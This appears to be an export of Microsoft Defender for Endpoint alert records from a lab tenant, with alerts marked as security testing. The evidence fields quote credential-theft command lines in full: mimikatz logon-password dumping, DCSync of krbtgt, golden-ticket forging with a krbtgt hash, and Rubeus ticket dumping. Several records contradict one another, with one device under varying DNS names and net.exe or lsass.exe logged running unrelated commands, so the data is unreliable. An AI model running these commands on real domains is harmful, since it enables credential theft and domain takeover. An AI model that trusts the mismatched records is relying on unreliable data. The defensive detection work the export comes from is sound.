"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:23:46.3233333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 11068,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-11-21T02:11:50.3921031Z",
"processId": 9404,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638001152944897194_415240227 | ea30b161-762d-47ea-b261-be7e53ac3cda | 486 | MicrosoftDefenderForEndpoint | 2022-09-30T06:14:54.4897391Z | 2022-11-19T01:35:42.7033333Z | 2022-10-01T01:36:00.5066667Z | 2022-09-30T06:11:51.9906915Z | 2022-09-30T06:11:51.9906915Z | Suspicious System Network Configuration Discovery | A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks. | Discovery | Resolved | Low | null | UnsupportedAlertType | TruePositive | SecurityTesting | WindowsDefenderAtp | 9bfe28a9-21eb-4f8a-b51e-38ebd3650c88 | msftadmin@msdxv2.m365dpoc.com | null | null | [
"T1016"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "test.domain",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-09-30T06:14:54.5333333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:54.5333333Z",
"fileName": "nslookup.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:51.7062175Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 10824,
"processCommandLine": "nslookup msdxv2-dc.msdxv2.m365dpoc.com",
"processCreationTime": "2022-09-30T06:11:51.7207947Z",
"processId": 7544,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "9a3be34e8316ebb945a4d5818a4066c91fe98c95",
"sha256": "54daf167f8dbe7fe0f23b37a600bd8d9d16b756d3b83f0804b5037cbbe895eb6",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-09-30T06:14:54.5333333Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-09-30T06:11:13.210308Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4064,
"processCommandLine": "\"cmd.exe\" /c \"nslookup msdxv2-dc.msdxv2.m365dpoc.com\"",
"processCreationTime": "2022-09-30T06:11:51.7062175Z",
"processId": 10824,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9",
"sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-16T08:31:10.5066667Z | Suspicious | None | jesse | test.domain | S-1-5-21-2300221942-1987151257-321556088-1109 | 34a6a005-fc93-42dc-ae87-352d3e9921c4 | jesse@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-09-30T06:14:52.3Z | Suspicious | Active | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 7,588 | ping 127.0.0.1 | 2022-09-30T06:11:51.8945322Z | 4,064 | 2022-09-30T06:11:13.210308Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
da638037515507445396_1217377639 | ef22de97-109c-48f5-afcc-938c1ddfbcd5 | 686 | MicrosoftDefenderForEndpoint | 2022-11-11T08:19:10.7445617Z | 2022-11-12T01:35:42.87Z | 2022-11-11T09:47:40.27713Z | 2022-11-11T08:17:09.0417181Z | 2022-11-11T08:17:39.4979706Z | Mimikatz credential theft tool | The Mimikatz hacktool was detected on this device. Mimikatz is a credential theft tool that can harvest plaintext passwords, password hashes, smartcard PINs, and Kerberos tickets. An attacker might be trying to harvest credentials to log into this or other devices on the network, by impersonating a valid user. | CredentialAccess | Resolved | High | 39 | SuccessfullyRemediated | TruePositive | SecurityTesting | WindowsDefenderAv | 8cac979e-6dcc-44ad-8355-480eebaff1c1 | msftadmin@msdxv2.m365dpoc.com | null | Mimikatz | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "rnd.local",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-11T08:19:10.7833333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": "The system cannot find the file specified.",
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:28:42.24Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:28:42.24Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-11T08:17:06.3382251Z",
"processId": 6044,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:29:11.78Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"mimikatz.exe\" \"lsadump::dcsync /domain:msdxv2.m365dpoc.com /user:krbtgt\" exit",
"processCreationTime": "2022-11-11T08:17:36.2207277Z",
"processId": 2420,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:29:13.0933333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"kerberos::golden /domain:msdxv2.m365dpoc.com /sid:S-1-5-21-1296854425-3029985372-4181197820 /krbtgt:334c5cf2bab300e3e456e328f5c699d3 /user:Steve /ticket:C:\\M365DAttack\\Admin-Tickets\\ticket.kirbi /ptt\" exit",
"processCreationTime": "2022-11-11T08:17:36.6575476Z",
"processId": 5180,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-21T02:03:39.97Z | Suspicious | None | jeff | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 10,556 | powershell -enc ZABpAHIA | 2022-11-21T02:01:37.8071047Z | 11,068 | 2022-11-21T02:01:28.4753286Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:10:33.5Z | Suspicious | None | admin | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-21T04:54:50.71Z | Suspicious | None | svc_acct | MSDXV8 | S-1-5-21-2159906967-4174806019-1002223092-1107 | null | steve@msdxv8.m365dpoc.com | 0a43ff3773e7fcbb9a98029957c41bc3af56ae94 | d2ae715f046aec3fccbfb4fe9624fa0c5b5cf45622ca2ace26de9f56552aebe2 | chrome.exe | C:\Program Files\Google\Chrome\Application | 11,548 | "chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=1984,i,9501624012299549115,11600505733383203802,131072 /prefetch:8 | 2022-12-21T04:51:32.1204974Z | 10,208 | 2022-12-21T04:51:30.5564156Z | chrome.exe | C:\Program Files\Google\Chrome\Application | Detected | 4f111b3b2366eacdcc66d7ad73548fff9b039c15 |
da638071952904737348_-1257045812 | f0b84ff9-f7d0-47cc-ba04-04d7fa9263d3 | 970 | MicrosoftDefenderForEndpoint | 2022-12-21T04:54:50.4737476Z | 2022-12-21T04:58:53.4333333Z | null | 2022-12-21T04:51:35.2938513Z | 2022-12-21T04:51:35.2938513Z | Connection to a custom network indicator | An endpoint has connected to a URL or domain in your list of custom indicators. | CommandAndControl | New | Informational | null | UnsupportedAlertType | null | null | CustomerTI | 08dfd06f-d2e2-4049-899f-67b406311d84 | null | null | null | [] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv8-win10b.msdxv8.m365dpoc.com",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV8"
}
],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "None",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08"
}
}
] | [
{
"aadUserId": null,
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV8",
"entityType": "User",
"evidenceCreationTime": "2022-12-21T04:54:50.71Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1107",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Url",
"evidenceCreationTime": "2022-12-21T04:54:50.71Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": "cnn.com",
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Url",
"evidenceCreationTime": "2022-12-21T04:54:50.71Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": "http://cnn.com/",
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-11-18T05:10:52.3466667Z | Suspicious | None | jeff | lab.net | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T17:06:12.14Z | Unknown | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:10:32.76Z | Suspicious | None | hacker | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1104 | e848b07a-87af-4448-9979-09f0b809c8d4 | jeff@msdxv2.m365dpoc.com | 4f4970c3545972fea2bc1984d597fc810e6321e0 | 25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369 | net.exe | C:\Windows\System32 | 4,744 | "net.exe" group /domain | 2022-11-18T05:09:25.177958Z | 4,976 | 2022-11-18T05:04:12.7150402Z | powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0 | Detected | c7e147cb0eb3534a4dcea5acb8e61c933713b145 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-11-18T05:12:05.5433333Z | Suspicious | Active | alice | MSDXV2 | S-1-5-21-2300221942-1987151257-321556088-1111 | 89b6fc86-af84-47b2-a72d-325362598b2c | ronhd@msdxv2.m365dpoc.com | fc870d086c53ded2e94300f7569aa9478186f2c7 | a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1 | Rubeus.exe | C:\Temp | 6,712 | Rubeus.exe dump /service:krbtgt /user:steve | 2022-11-18T05:10:14.9715084Z | 8,784 | 2022-11-18T05:10:14.9168031Z | cmd.exe | C:\Windows\System32 | Detected | 36150b3c1b69b5c2da9df4efd86ac6c166924a48 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | Process | 2022-12-22T08:48:30.2433333Z | Suspicious | None | SYSTEM | NT AUTHORITY | S-1-5-18 | null | null | 0fb26350106c9bdd196d4e7d01eb30007663687c | bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f | lsass.exe | C:\Windows\System32 | 720 | ipconfig | 2022-12-22T08:22:31.2215121Z | 568 | 2022-12-22T08:22:31.0581711Z | wininit.exe | C:\Windows\System32 | Detected | 7ba8aa008687dd62d639cb45b52c7c9f971c65c1 |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | User | 2022-12-14T08:32:00.2766667Z | Benign | None | darol | msdxv2.m365dpoc | S-1-5-21-2300221942-1987151257-321556088-1110 | 598763ac-48bb-4671-9472-6be219756e33 | darol@msdxv2.m365dpoc.com | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043451809630419_-665093391 | beaf820c-2f6c-4b34-8b75-09f18ebaf689 | 741 | MicrosoftDefenderForEndpoint | 2022-11-18T05:13:00.9630666Z | 2022-11-19T01:35:46.6533333Z | 2022-11-19T01:35:46.5533333Z | 2022-11-18T05:11:26.6986272Z | 2022-11-18T05:16:26.1851657Z | Password hashes dumped from LSASS memory | LSASS process memory has been read to obtain password hashes, indicating possible credential theft. Attackers can use hashes obtained from LSASS process memory to impersonate or perform actions on behalf of logged on or recently logged on users. | CredentialAccess | Resolved | Medium | 47 | PartiallyInvestigated | TruePositive | SecurityTesting | WindowsDefenderAtp | 2ed33edd-2c33-49fd-877b-ab73fba14d59 | takeshi@msdxv2.m365dpoc.com | null | null | [
"T1003",
"T1003.001"
] | [
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "prod.env",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] | [
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:13:01.0066667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:13:01.0066667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:13:01.0066667Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4976,
"processCommandLine": "\"mimikatz.exe\" privilege::debug sekurlsa::logonpasswords exit",
"processCreationTime": "2022-11-18T05:09:25.5414924Z",
"processId": 7696,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
"sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:13:01.0066667Z",
"fileName": "lsass.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:06:09.0096674Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": "\\Device\\HarddiskVolume4\\Windows\\System32",
"parentProcessId": 532,
"processCommandLine": "lsass.exe",
"processCreationTime": "2022-11-10T07:06:09.0866649Z",
"processId": 624,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c",
